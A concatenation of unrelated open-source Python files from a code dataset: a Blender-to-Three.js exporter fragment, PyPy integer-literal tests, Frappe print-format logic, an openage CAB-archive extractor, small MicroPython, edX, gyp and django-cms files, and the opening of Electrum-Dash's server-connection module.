constants.ARRAY: array
}
def _parse_geometry(self):
"""Parse the geometry to Three.Geometry specs"""
if self.options.get(constants.VERTICES):
logger.info("Parsing %s", constants.VERTICES)
self[constants.VERTICES] = api.mesh.vertices(self.node) or []
if self.options.get(constants.NORMALS):
logger.info("Parsing %s", constants.NORMALS)
self[constants.NORMALS] = api.mesh.normals(self.node) or []
if self.options.get(constants.COLORS):
logger.info("Parsing %s", constants.COLORS)
self[constants.COLORS] = api.mesh.vertex_colors(
self.node) or []
if self.options.get(constants.FACE_MATERIALS):
logger.info("Parsing %s", constants.FACE_MATERIALS)
self[constants.MATERIALS] = api.mesh.materials(
self.node, self.options) or []
if self.options.get(constants.UVS):
logger.info("Parsing %s", constants.UVS)
self[constants.UVS] = api.mesh.uvs(self.node) or []
if self.options.get(constants.FACES):
logger.info("Parsing %s", constants.FACES)
self[constants.FACES] = api.mesh.faces(
self.node, self.options) or []
no_anim = (None, False, constants.OFF)
if self.options.get(constants.ANIMATION) not in no_anim:
logger.info("Parsing %s", constants.ANIMATION)
self[constants.ANIMATION] = api.mesh.skeletal_animation(
self.node, self.options) or []
#@TODO: considering making bones data implied when
# querying skinning data
bone_map = {}
if self.options.get(constants.BONES):
logger.info("Parsing %s", constants.BONES)
bones, bone_map = api.mesh.bones(self.node, self.options)
self[constants.BONES] = bones
if self.options.get(constants.SKINNING):
logger.info("Parsing %s", constants.SKINNING)
influences = self.options.get(
constants.INFLUENCES_PER_VERTEX, 2)
self[constants.INFLUENCES_PER_VERTEX] = influences
self[constants.SKIN_INDICES] = api.mesh.skin_indices(
self.node, bone_map, influences) or []
self[constants.SKIN_WEIGHTS] = api.mesh.skin_weights(
self.node, bone_map, influences) or []
if self.options.get(constants.MORPH_TARGETS):
logger.info("Parsing %s", constants.MORPH_TARGETS)
self[constants.MORPH_TARGETS] = api.mesh.morph_targets(
self.node, self.options) or []
|
sauloal/pycluster | refs/heads/master | pypy-1.9_64/lib-python/2.7/test/test_int_literal.py | 139 | """Test correct treatment of hex/oct constants.
This is complex because of changes due to PEP 237.
"""
import unittest
from test import test_support
class TestHexOctBin(unittest.TestCase):
def test_hex_baseline(self):
# A few upper/lowercase tests
self.assertEqual(0x0, 0X0)
self.assertEqual(0x1, 0X1)
self.assertEqual(0x123456789abcdef, 0X123456789abcdef)
# Baseline tests
self.assertEqual(0x0, 0)
self.assertEqual(0x10, 16)
self.assertEqual(0x7fffffff, 2147483647)
self.assertEqual(0x7fffffffffffffff, 9223372036854775807)
# Ditto with a minus sign and parentheses
self.assertEqual(-(0x0), 0)
self.assertEqual(-(0x10), -16)
self.assertEqual(-(0x7fffffff), -2147483647)
self.assertEqual(-(0x7fffffffffffffff), -9223372036854775807)
# Ditto with a minus sign and NO parentheses
self.assertEqual(-0x0, 0)
self.assertEqual(-0x10, -16)
self.assertEqual(-0x7fffffff, -2147483647)
self.assertEqual(-0x7fffffffffffffff, -9223372036854775807)
def test_hex_unsigned(self):
# Positive constants
self.assertEqual(0x80000000, 2147483648L)
self.assertEqual(0xffffffff, 4294967295L)
# Ditto with a minus sign and parentheses
self.assertEqual(-(0x80000000), -2147483648L)
self.assertEqual(-(0xffffffff), -4294967295L)
# Ditto with a minus sign and NO parentheses
# This failed in Python 2.2 through 2.2.2 and in 2.3a1
self.assertEqual(-0x80000000, -2147483648L)
self.assertEqual(-0xffffffff, -4294967295L)
# Positive constants
self.assertEqual(0x8000000000000000, 9223372036854775808L)
self.assertEqual(0xffffffffffffffff, 18446744073709551615L)
# Ditto with a minus sign and parentheses
self.assertEqual(-(0x8000000000000000), -9223372036854775808L)
self.assertEqual(-(0xffffffffffffffff), -18446744073709551615L)
# Ditto with a minus sign and NO parentheses
# This failed in Python 2.2 through 2.2.2 and in 2.3a1
self.assertEqual(-0x8000000000000000, -9223372036854775808L)
self.assertEqual(-0xffffffffffffffff, -18446744073709551615L)
def test_oct_baseline(self):
# Baseline tests
self.assertEqual(00, 0)
self.assertEqual(020, 16)
self.assertEqual(017777777777, 2147483647)
self.assertEqual(0777777777777777777777, 9223372036854775807)
# Ditto with a minus sign and parentheses
self.assertEqual(-(00), 0)
self.assertEqual(-(020), -16)
self.assertEqual(-(017777777777), -2147483647)
self.assertEqual(-(0777777777777777777777), -9223372036854775807)
# Ditto with a minus sign and NO parentheses
self.assertEqual(-00, 0)
self.assertEqual(-020, -16)
self.assertEqual(-017777777777, -2147483647)
self.assertEqual(-0777777777777777777777, -9223372036854775807)
def test_oct_baseline_new(self):
# A few upper/lowercase tests
self.assertEqual(0o0, 0O0)
self.assertEqual(0o1, 0O1)
self.assertEqual(0o1234567, 0O1234567)
# Baseline tests
self.assertEqual(0o0, 0)
self.assertEqual(0o20, 16)
self.assertEqual(0o17777777777, 2147483647)
self.assertEqual(0o777777777777777777777, 9223372036854775807)
# Ditto with a minus sign and parentheses
self.assertEqual(-(0o0), 0)
self.assertEqual(-(0o20), -16)
self.assertEqual(-(0o17777777777), -2147483647)
self.assertEqual(-(0o777777777777777777777), -9223372036854775807)
# Ditto with a minus sign and NO parentheses
self.assertEqual(-0o0, 0)
self.assertEqual(-0o20, -16)
self.assertEqual(-0o17777777777, -2147483647)
self.assertEqual(-0o777777777777777777777, -9223372036854775807)
def test_oct_unsigned(self):
# Positive constants
self.assertEqual(020000000000, 2147483648L)
self.assertEqual(037777777777, 4294967295L)
# Ditto with a minus sign and parentheses
self.assertEqual(-(020000000000), -2147483648L)
self.assertEqual(-(037777777777), -4294967295L)
# Ditto with a minus sign and NO parentheses
# This failed in Python 2.2 through 2.2.2 and in 2.3a1
self.assertEqual(-020000000000, -2147483648L)
self.assertEqual(-037777777777, -4294967295L)
# Positive constants
self.assertEqual(01000000000000000000000, 9223372036854775808L)
self.assertEqual(01777777777777777777777, 18446744073709551615L)
# Ditto with a minus sign and parentheses
self.assertEqual(-(01000000000000000000000), -9223372036854775808L)
self.assertEqual(-(01777777777777777777777), -18446744073709551615L)
# Ditto with a minus sign and NO parentheses
# This failed in Python 2.2 through 2.2.2 and in 2.3a1
self.assertEqual(-01000000000000000000000, -9223372036854775808L)
self.assertEqual(-01777777777777777777777, -18446744073709551615L)
def test_oct_unsigned_new(self):
# Positive constants
self.assertEqual(0o20000000000, 2147483648L)
self.assertEqual(0o37777777777, 4294967295L)
# Ditto with a minus sign and parentheses
self.assertEqual(-(0o20000000000), -2147483648L)
self.assertEqual(-(0o37777777777), -4294967295L)
# Ditto with a minus sign and NO parentheses
# This failed in Python 2.2 through 2.2.2 and in 2.3a1
self.assertEqual(-0o20000000000, -2147483648L)
self.assertEqual(-0o37777777777, -4294967295L)
# Positive constants
self.assertEqual(0o1000000000000000000000, 9223372036854775808L)
self.assertEqual(0o1777777777777777777777, 18446744073709551615L)
# Ditto with a minus sign and parentheses
self.assertEqual(-(0o1000000000000000000000), -9223372036854775808L)
self.assertEqual(-(0o1777777777777777777777), -18446744073709551615L)
# Ditto with a minus sign and NO parentheses
# This failed in Python 2.2 through 2.2.2 and in 2.3a1
self.assertEqual(-0o1000000000000000000000, -9223372036854775808L)
self.assertEqual(-0o1777777777777777777777, -18446744073709551615L)
def test_bin_baseline(self):
# A few upper/lowercase tests
self.assertEqual(0b0, 0B0)
self.assertEqual(0b1, 0B1)
self.assertEqual(0b10101010101, 0B10101010101)
# Baseline tests
self.assertEqual(0b0, 0)
self.assertEqual(0b10000, 16)
self.assertEqual(0b1111111111111111111111111111111, 2147483647)
self.assertEqual(0b111111111111111111111111111111111111111111111111111111111111111, 9223372036854775807)
# Ditto with a minus sign and parentheses
self.assertEqual(-(0b0), 0)
self.assertEqual(-(0b10000), -16)
self.assertEqual(-(0b1111111111111111111111111111111), -2147483647)
self.assertEqual(-(0b111111111111111111111111111111111111111111111111111111111111111), -9223372036854775807)
# Ditto with a minus sign and NO parentheses
self.assertEqual(-0b0, 0)
self.assertEqual(-0b10000, -16)
self.assertEqual(-0b1111111111111111111111111111111, -2147483647)
self.assertEqual(-0b111111111111111111111111111111111111111111111111111111111111111, -9223372036854775807)
def test_bin_unsigned(self):
# Positive constants
self.assertEqual(0b10000000000000000000000000000000, 2147483648L)
self.assertEqual(0b11111111111111111111111111111111, 4294967295L)
# Ditto with a minus sign and parentheses
self.assertEqual(-(0b10000000000000000000000000000000), -2147483648L)
self.assertEqual(-(0b11111111111111111111111111111111), -4294967295L)
# Ditto with a minus sign and NO parentheses
# This failed in Python 2.2 through 2.2.2 and in 2.3a1
self.assertEqual(-0b10000000000000000000000000000000, -2147483648L)
self.assertEqual(-0b11111111111111111111111111111111, -4294967295L)
# Positive constants
self.assertEqual(0b1000000000000000000000000000000000000000000000000000000000000000, 9223372036854775808L)
self.assertEqual(0b1111111111111111111111111111111111111111111111111111111111111111, 18446744073709551615L)
# Ditto with a minus sign and parentheses
self.assertEqual(-(0b1000000000000000000000000000000000000000000000000000000000000000), -9223372036854775808L)
self.assertEqual(-(0b1111111111111111111111111111111111111111111111111111111111111111), -18446744073709551615L)
# Ditto with a minus sign and NO parentheses
# This failed in Python 2.2 through 2.2.2 and in 2.3a1
self.assertEqual(-0b1000000000000000000000000000000000000000000000000000000000000000, -9223372036854775808L)
self.assertEqual(-0b1111111111111111111111111111111111111111111111111111111111111111, -18446744073709551615L)
def test_main():
test_support.run_unittest(TestHexOctBin)
if __name__ == "__main__":
test_main()
|
yashodhank/frappe | refs/heads/develop | frappe/print/doctype/print_format/print_format.py | 9 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
import frappe.utils
import json
from frappe.utils.jinja import validate_template
from frappe.model.document import Document
class PrintFormat(Document):
def validate(self):
if (self.standard=="Yes"
and not frappe.local.conf.get("developer_mode")
and not (frappe.flags.in_import or frappe.flags.in_test)):
frappe.throw(frappe._("Standard Print Format cannot be updated"))
# old_doc_type is required for clearing item cache
self.old_doc_type = frappe.db.get_value('Print Format',
self.name, 'doc_type')
self.extract_images()
if self.html:
validate_template(self.html)
def extract_images(self):
from frappe.utils.file_manager import extract_images_from_html
if self.format_data:
data = json.loads(self.format_data)
for df in data:
if df.get('fieldtype') and df['fieldtype'] in ('HTML', 'Custom HTML') and df.get('options'):
df['options'] = extract_images_from_html(self, df['options'])
self.format_data = json.dumps(data)
def on_update(self):
if hasattr(self, 'old_doc_type') and self.old_doc_type:
frappe.clear_cache(doctype=self.old_doc_type)
if self.doc_type:
frappe.clear_cache(doctype=self.doc_type)
self.export_doc()
def export_doc(self):
# export
if self.standard == 'Yes' and (frappe.conf.get('developer_mode') or 0) == 1:
module = frappe.db.get_value("DocType", self.doc_type, "module")
from frappe.modules.export_file import export_to_files
export_to_files(record_list=[['Print Format', self.name]],
record_module= module)
def on_trash(self):
if self.doc_type:
frappe.clear_cache(doctype=self.doc_type)
@frappe.whitelist()
def make_default(name):
"""Set print format as default"""
frappe.has_permission("Print Format", "write")
print_format = frappe.get_doc("Print Format", name)
if (frappe.conf.get('developer_mode') or 0) == 1:
# developer mode, set it default in doctype
doctype = frappe.get_doc("DocType", print_format.doc_type)
doctype.default_print_format = name
doctype.save()
else:
# customization
frappe.make_property_setter({
'doctype_or_field': "DocType",
'doctype': print_format.doc_type,
'property': "default_print_format",
'value': name,
})
frappe.msgprint(frappe._("Done"))
|
StefaFaerb1/Stefanie | refs/heads/master | py/openage/convert/cabextract/cab.py | 46 | import os
from struct import Struct
from bisect import bisect
from . import lzxd
class Error(Exception):
pass
class Namespace:
def __init__(self, *mappings, **kwargs):
self._update(*mappings, **kwargs)
def _update(self, *mappings, **kwargs):
for mapping in mappings:
if type(mapping) != dict:
mapping = vars(mapping)
self._update(**mapping)
for k, v in kwargs.items():
self[k] = v
def __getitem__(self, k):
if k[0] == '_':
raise Exception("key mustn't start with _")
return getattr(self, k)
def __setitem__(self, k, v):
if k[0] == '_':
raise Exception("key mustn't start with _")
setattr(self, k, v)
def __str__(self):
result = []
items = sorted(vars(self).items())
klen = max((len(k) for k, v in items))
for k, v in items:
result.append(k.ljust(klen) + " = " + str(v))
return '\n'.join(result)
def __repr__(self):
return repr(vars(self))
class ByteQueue:
def __init__(self):
import collections
self.bufs = collections.deque()
self.size = 0
self.pos = 0
def __len__(self):
return self.size
def append(self, buf):
self.bufs.append(buf)
self.size += len(buf)
def popleft(self, size):
if size > self.size:
raise Exception("queue does not contain enough bytes")
self.size -= size
self.pos += size
resultbufs = []
required = size
while required > 0:
buf = self.bufs.popleft()
resultbufs.append(buf)
required -= len(buf)
if required < 0:
# we requested too much; split the last buffer
buf = resultbufs.pop()
popped = buf[:required]
kept = buf[required:]
resultbufs.append(popped)
self.bufs.appendleft(kept)
return b"".join(resultbufs)
class IterCache:
def __init__(self, iterator):
self.iterator = iterator
self.next()
def next(self):
self.current = next(self.iterator)
def read_bytes(f, count):
data = f.read(count)
if len(data) != count:
raise Error("Unexpected EOF")
return data
def read_at(f, pos, count):
oldpos = f.tell()
f.seek(pos)
data = read_bytes(f, count)
f.seek(oldpos)
return data
def read_string(f, maxlen = 255):
result = b""
while True:
c = read_bytes(f, 1)
if c == b"\0":
return result
else:
result += c
if len(result) > maxlen:
raise Error("expected \\0; string too long")
def try_decode(s):
try:
return s.decode('utf-8')
except:
return s.decode('iso-8859-1')
class NamedMemberStruct:
def __init__(self, endianness, *members):
specstr = endianness
self.members = []
self.membertypes = []
for membertype, membername in members:
specstr += membertype
if membertype == "x":
continue
self.members.append(membername)
self.membertypes.append(membertype)
self.struct = Struct(specstr)
def read(self, f):
vals = self.struct.unpack(read_bytes(f, self.struct.size))
return Namespace({k: v for v, k in zip(vals, self.members)})
def default(self):
result = Namespace()
for membertype, name in zip(self.membertypes, self.members):
if membertype in "?":
val = False
elif membertype in "cbBhHiIlLfdnNPqQ":
val = 0
elif membertype[-1] in "sp":
val = b""
else:
raise Error("Unknown default for type " + membertype)
result[name] = val
return result
class FlagDecoder:
def __init__(self, *flags):
self.flags = []
for bitpos, name in flags:
self.flags.append(((1 << bitpos), name))
def decode(self, val):
result = Namespace()
for flagweight, flagname in self.flags:
if val & flagweight:
hasflag = True
val ^= flagweight
else:
hasflag = False
result[flagname] = hasflag
if val:
raise Error("Undefined flag values: " + str(flag))
return result
def default(self):
return Namespace({name: False for _, name in self.flags})
cfheaderflags_decoder = FlagDecoder(
(0, "prev_cabinet"), # this cabfile is not the first of the set.
# szCabinetPrev and szDiskPrev are present
# after the header.
(1, "next_cabinet"), # this cabfile is not the last of the set.
# szCabinetNext and szDiskNext are present
# after the header.
(2, "reserve_present") # this cabinet file has reserved fields.
# cbCFHeader, cbCFFolder, and cbCFData
# are present after the header, followed by
# cbCFHeader bytes of data.
)
cfheader_struct = NamedMemberStruct("<",
("4s", "signature"), # magic number: MSCF
("I", "reserved1"), #
("I", "cbCabinet"), # size of this cabinet file in bytes
("I", "reserved2"), #
("I", "coffFiles"), # absolute offset of the first CFFILE entry
("I", "reserved3"), #
("B", "versionMinor"), # cab file format version (minor)
("B", "versionMajor"), # cab file format version (major)
("H", "cFolders"), # number of CFFOLDER entries in this cabinet
("H", "cFiles"), # number of CFFILES entries in this cabinet
("H", "flags"), # see cfheaderflags_decoder
("H", "setID"), # must be same in all cabinets of a set
("H", "iCabinet"), # number of this cabinet file in the set
)
cfheader_reservedfields_struct = NamedMemberStruct("<",
("H", "cbCFHeader"), # size of per-cabinet reserved area
("B", "cbCFFolder"), # size of per-folder reserved area
("B", "cbCFData"), # size of per-datablock reserved area
)
cffolder_struct = NamedMemberStruct("<",
("I", "coffCabStart"), # absolute file offset of first CFDATA block
("H", "cCFData"), # number of CFDATA blocks
("H", "typeCompress"), # compression type. only the 4 last significant
# bits seem to be relevant.
)
cffileattribsflag_decoder = FlagDecoder(
(0, "rdonly"), # readonly
(1, "hidden"), # hidden
(2, "system"), # system file
(5, "arch"), # archive flag: modified since last backup
(6, "exec"), # run after extraction
(7, "name_is_utf"), # name is UTF-8, not "current locale" (8859-1)
)
cffile_struct = NamedMemberStruct("<",
("I", "cbFile"), # uncompressed filesize
("I", "uoffFolderStart"), # uncompressed offset of file in folder
("H", "iFolder"), # index of the folder that contains this file.
# there are several special indices:
# 0xFFFD continued_from_prev: 0
# 0xFFFE continued_to_next: -1
# 0xFFFF continued_prev_and_next: 0
("H", "date"), # date stamp ((y–1980) << 9)+(m << 5)+(d) wtf.
("H", "time"), # time stamp (h << 11)+(m << 5)+(s >> 1) røfl.
("H", "attribs"), # see cffileattribsflag_decoder
)
cfdata_struct = NamedMemberStruct("<",
("I", "csum"), # checksum of cbData through ab
("H", "cbData"), # number of compressed bytes
("H", "cbUncomp"), # number of uncompressed bytes
# abReserve[header.cbCFData],
# ab[cbData]
)
class CABFile:
def __init__(self, filename, readfiledata=False):
f = open(filename, 'rb')
# read header
header = cfheader_struct.read(f)
if header.signature != b"MSCF":
raise Error("invalid CAB file signature")
# decode flags
header._update(cfheaderflags_decoder.decode(header.flags))
# read reserve header (optional)
if header.reserve_present:
header._update(cfheader_reservedfields_struct.read(f))
else:
header._update(cfheader_reservedfields_struct.default())
# read abReserve
header.abReserve = read_bytes(f, header.cbCFHeader)
# read previous cabinet info
if header.prev_cabinet:
header.szCabinetPrev = try_decode(read_string(f))
header.szDiskPrev = try_decode(read_string(f))
else:
header.szCabinetPrev = None
header.szDiskPrev = None
# read next cabinet info
if header.next_cabinet:
header.szCabinetNext = try_decode(read_string(f))
header.szDiskNext = try_decode(read_string(f))
else:
header.szCabinetNext = None
header.szDiskNext = None
folders = []
# read folder headers
for i in range(header.cFolders):
folder = cffolder_struct.read(f)
# read abReserve
folder.abReserve = read_bytes(f, header.cbCFFolder)
folder.comptype_masked = folder.typeCompress & 0x000f
folder.comp_window_size = (folder.typeCompress >> 8) & 0x1f
if folder.comptype_masked == 0:
folder.comptype = "plain"
raise Error("plain compression is unsupported (uhm, yes.)")
elif folder.comptype_masked == 1:
folder.comptype = "MSZIP"
raise Error("MSZIP compression is unsupported")
elif folder.comptype_masked == 2:
folder.comptype = "QUANTUM"
raise Error("Quantum compression is unsupported")
elif folder.comptype_masked == 3:
folder.comptype = "LZX"
else:
raise Error("Unknown compression type: " +
str(folder.comptype_masked))
folder.index = i
folders.append(folder)
# read file headers
if f.tell() != header.coffFiles:
f.seek(header.coffFiles)
print("cabfile has nonstandard format: seek to header.coffFiles " +
"was required")
files = {}
files_lowercase = {}
for _ in range(header.cFiles):
file_ = cffile_struct.read(f)
# decode flags
file_._update(cffileattribsflag_decoder.decode(file_.attribs))
# read filename
file_.name = read_string(f)
# decode filename according to flags
if file_.name_is_utf:
file_.name = file_.name.decode('utf-8')
else:
file_.name = file_.name.decode('iso-8859-1')
file_.continued_from_prev = False
file_.continued_to_next = False
if file_.iFolder == 0xFFFD:
file_.iFolder = 0
file_.continued_from_prev = True
elif file_.iFolder == 0xFFFE:
file_.iFolder = len(folders) - 1
file_.continued_to_next = True
elif file_.iFolder == 0xFFFF:
file_.iFolder = 0
file_.continued_from_prev = True
file_.continued_to_next = True
year = (file_.date >> 9) + 1980
month = (file_.date >> 5) & 0x000f
day = (file_.date >> 0) & 0x001f
hour = (file_.time >> 11)
minute = (file_.time >> 5) & 0x003f
sec = (file_.time << 1) & 0x003f
import datetime
dt = datetime.datetime(year, month, day, hour, minute, sec)
import calendar
file_.timestamp = calendar.timegm(dt.utctimetuple())
# no timezone info is available; assume UTC.
# cosmetic changes
file_.folderid = file_.iFolder
file_.name = file_.name.replace('\\', '/')
file_.size = file_.cbFile
file_.pos = file_.uoffFolderStart
# insert file into dicts
if file_.name in files:
raise Exception("multiple files with name %s" % file_.name)
files[file_.name] = file_
lowername = file_.name.lower()
if lowername in files_lowercase:
raise Exception("multiple files with lower-case name %s"
% lowername)
files_lowercase[lowername] = file_
# read data block metainfo
for folder in folders:
folder.datablocks = []
if f.tell() != folder.coffCabStart:
print("cabfile has strange format: seek to first data block" +
"of folder " + str(folder.index) + " is required.")
f.seek(folder.coffCabStart)
folder.uncompressed_size = 0
for _ in range(folder.cCFData):
datablock = cfdata_struct.read(f)
datablock.abReserve = read_bytes(f, header.cbCFData)
datablock.ab_start = f.tell()
datablock.ab_size = datablock.cbData
f.seek(datablock.ab_size, 1)
# checksum is unimplemented for now
folder.datablocks.append(datablock)
folder.uncompressed_size += datablock.cbUncomp
folder.pseudofile = FolderPseudoFile(folder, f)
self.f = f
self.header = header
self.folders = folders
self.files = files
self.files_lowercase = files_lowercase
self.filedata_read = False
if readfiledata:
self.readfiledata()
def readfiledata(self):
def listfiles():
"""
will yield metadata for all files that are contained in this cab,
in the exact order in which their data is contained in the
uncompressed folder(s).
"""
for f in sorted(self.files.values(),
key=lambda f: (f.folderid, f.pos)):
yield f
# a "None" file
yield Namespace(folderid=None)
# files.current is the currently returned file
# files.next() seeks the next file
files = IterCache(listfiles())
iter(iter([1]))
for folderid, folder in enumerate(self.folders):
buf = ByteQueue()
def decomp_write(data):
buf.append(data)
# check whether currentbuf contains complete files
while True:
if folderid != files.current.folderid:
# there are no more files in this folder
break
if files.current.pos > buf.pos:
# the current file does _not_ begin at the start of
# the buffer; there are some garbage bytes!
discard = min(len(buf), files.current.pos - buf.pos)
buf.pop(discard)
print("warning: discarding %d bytes in folder %d!"
% (discard, folderid))
if files.current.pos < buf.pos:
# the beginning of the file is missing
raise Exception("File start position invalid: %s"
% (files.current.name))
if len(buf) < files.current.size:
# the file data is not yet fully loaded into buf.
break
files.current.data = buf.popleft(files.current.size)
files.next()
# the callback API wants us to return len(data)
return len(data)
if folder.comptype == 'LZX':
lzxd.decompress(folder.comp_window_size, folder.uncompressed_size, folder.pseudofile.read, decomp_write)
else:
raise Exception("Unsupported folder compression: " + folder.comptype)
if buf:
print("warning: the last %d bytes of folder %d are being discarded!" % (len(currentbuf), folderid))
if files.current.folderid == folderid:
raise Exception("Unexpected end of folder %d while reading data for %s" % (folderid, meta[fileno][2].name))
if files.current.folderid != None:
raise Exception("Missing folder: %d" % (files.current.folderid))
self.filedata_read = True
def open(self, name, mode='rb', ignorecase=True):
if mode != 'rb':
raise Exception("mode most be 'rb'")
if ignorecase:
f = self.files_lowercase[name.lower()]
else:
f = self.files[name]
if not self.filedata_read:
self.readfiledata()
return BlobPseudoFile(f.data)
class BlobPseudoFile:
def __init__(self, blob):
self.blob = blob
self.pos = 0
def tell(self):
return self.pos
def seek(self, offset, fromwhat = 0):
if fromwhat == 0:
self.pos = offset + 0
elif fromwhat == 1:
self.pos = offset + self.pos
elif fromwhat == 2:
self.pos = offset + len(self.blob)
return self.pos
def read(self, size=-1):
if size < 0:
size = float("+inf")
size = max(0, min(size, len(self.blob) - self.pos))
return self.blob[self.pos:self.pos + size]
self.pos += size
class FolderPseudoFile:
def __init__(self, folder, f):
self.f = f
self.pos = 0
self.size = 0
self.datablockanchors = []
self.datablocks = []
for db in folder.datablocks:
self.datablockanchors.append(self.size)
self.datablocks.append((db.ab_start, db.ab_size)) # physical start, size
self.size += db.ab_size
def close(self):
del self.f
def current_datablock(self):
return bisect(self.datablockanchors, self.pos) - 1
def datablock_remaining(self, idx):
return max(0, self.datablock_size(idx) - self.pos_in_datablock(idx))
def datablock_size(self, idx):
return self.datablocks[idx][1]
def datablock_physicalstart(self, idx):
return self.datablocks[idx][0]
def pos_in_datablock(self, idx):
return self.pos - self.datablockanchors[idx]
def tell(self):
return self.pos
def seek(self, offset, fromwhat = 0):
if fromwhat == 0:
self.pos = offset + 0
elif fromwhat == 1:
self.pos = offset + self.pos
elif fromwhat == 2:
self.pos = offset + self.size
return self.pos
def read(self, size=-1):
if size < 0:
size = float("+inf")
# find the datablock we're currently in
idx = self.current_datablock()
result = []
while True:
# remaining data in this block
rem = self.datablock_remaining(idx)
bytecount = min(rem, size)
# this is the last datablock we need
result.append(read_at(self.f, self.datablock_physicalstart(idx) + self.pos_in_datablock(idx), bytecount))
self.pos += bytecount
size -= bytecount
if size == 0:
# done reading
return b"".join(result)
if self.pos >= self.size:
# EOF
return b"".join(result)
# move on to next datablock
idx += 1
|
martinribelotta/micropython | refs/heads/master | tests/basics/closure_defargs.py | 118 | # test closure with default args
def f():
a = 1
def bar(b = 10, c = 20):
print(a + b + c)
bar()
bar(2)
bar(2, 3)
print(f())
|
synergeticsedx/deployment-wipro | refs/heads/oxa/master.fic | common/djangoapps/util/config_parse.py | 197 | """
Helper functions for configuration parsing
"""
import collections
def convert_tokens(tokens):
"""
This function is called on the token
dictionary that is imported from a yaml file.
It returns a new dictionary where
all strings containing 'None' are converted
to a literal None due to a bug in Ansible
"""
if tokens == 'None':
return None
elif isinstance(tokens, basestring) or (not isinstance(tokens, collections.Iterable)):
return tokens
elif isinstance(tokens, dict):
return {
convert_tokens(k): convert_tokens(v)
for k, v in tokens.items()
}
else:
return [convert_tokens(v) for v in tokens]
|
farhaadila/django-cms | refs/heads/develop | cms/test_utils/project/mti_pluginapp/migrations/__init__.py | 12133432 | |
seann1/portfolio5 | refs/heads/master | .meteor/dev_bundle/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/generator/ninja_test.py | 1843 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
""" Unit tests for the ninja.py file. """
import gyp.generator.ninja as ninja
import unittest
import StringIO
import sys
import TestCommon
class TestPrefixesAndSuffixes(unittest.TestCase):
def test_BinaryNamesWindows(self):
# These cannot run on non-Windows as they require a VS installation to
# correctly handle variable expansion.
if sys.platform.startswith('win'):
writer = ninja.NinjaWriter('foo', 'wee', '.', '.', 'build.ninja', '.',
'build.ninja', 'win')
spec = { 'target_name': 'wee' }
self.assertTrue(writer.ComputeOutputFileName(spec, 'executable').
endswith('.exe'))
self.assertTrue(writer.ComputeOutputFileName(spec, 'shared_library').
endswith('.dll'))
self.assertTrue(writer.ComputeOutputFileName(spec, 'static_library').
endswith('.lib'))
def test_BinaryNamesLinux(self):
writer = ninja.NinjaWriter('foo', 'wee', '.', '.', 'build.ninja', '.',
'build.ninja', 'linux')
spec = { 'target_name': 'wee' }
self.assertTrue('.' not in writer.ComputeOutputFileName(spec,
'executable'))
self.assertTrue(writer.ComputeOutputFileName(spec, 'shared_library').
startswith('lib'))
self.assertTrue(writer.ComputeOutputFileName(spec, 'static_library').
startswith('lib'))
self.assertTrue(writer.ComputeOutputFileName(spec, 'shared_library').
endswith('.so'))
self.assertTrue(writer.ComputeOutputFileName(spec, 'static_library').
endswith('.a'))
if __name__ == '__main__':
unittest.main()
|
dashpay/electrum-dash | refs/heads/master | lib/interface.py | 7 | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import re
import socket
import ssl
import sys
import threading
import time
import traceback
import requests
ca_path = requests.certs.where()
import util
import x509
import pem
def Connection(server, queue, config_path):
"""Makes asynchronous connections to a remote electrum server.
Returns the running thread that is making the connection.
Once the thread has connected, it finishes, placing a tuple on the
queue of the form (server, socket), where socket is None if
connection failed.
"""
host, port, protocol = server.split(':')
if not protocol in 'st':
raise Exception('Unknown protocol: %s' % protocol)
c = TcpConnection(server, queue, config_path)
c.start()
return c
class TcpConnection(threading.Thread, util.PrintError):
def __init__(self, server, queue, config_path):
threading.Thread.__init__(self)
self.config_path = config_path
self.queue = queue
self.server = server
self.host, self.port, self.protocol = self.server.split(':')
self.host = str(self.host)
self.port = int(self.port)
self.use_ssl = (self.protocol == 's')
self.daemon = True
def diagnostic_name(self):
return self.host
def check_host_name(self, peercert, name):
"""Simple certificate/host name checker. Returns True if the
certificate matches, False otherwise. Does not support
wildcards."""
# Check that the peer has supplied a certificate.
# None/{} is not acceptable.
if not peercert:
return False
if peercert.has_key("subjectAltName"):
for typ, val in peercert["subjectAltName"]:
if typ == "DNS" and val == name:
return True
else:
# Only check the subject DN if there is no subject alternative
# name.
cn = None
for attr, val in peercert["subject"]:
# Use most-specific (last) commonName attribute.
if attr == "commonName":
cn = val
if cn is not None:
return cn == name
return False
def get_simple_socket(self):
try:
l = socket.getaddrinfo(self.host, self.port, socket.AF_UNSPEC, socket.SOCK_STREAM)
except socket.gaierror:
self.print_error("cannot resolve hostname")
return
for res in l:
try:
s = socket.socket(res[0], socket.SOCK_STREAM)
s.settimeout(10)
s.connect(res[4])
s.settimeout(2)
s.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
return s
except BaseException as e:
continue
else:
self.print_error("failed to connect", str(e))
def get_socket(self):
if self.use_ssl:
cert_path = os.path.join(self.config_path, 'certs', self.host)
if not os.path.exists(cert_path):
is_new = True
s = self.get_simple_socket()
if s is None:
return
# try with CA first
try:
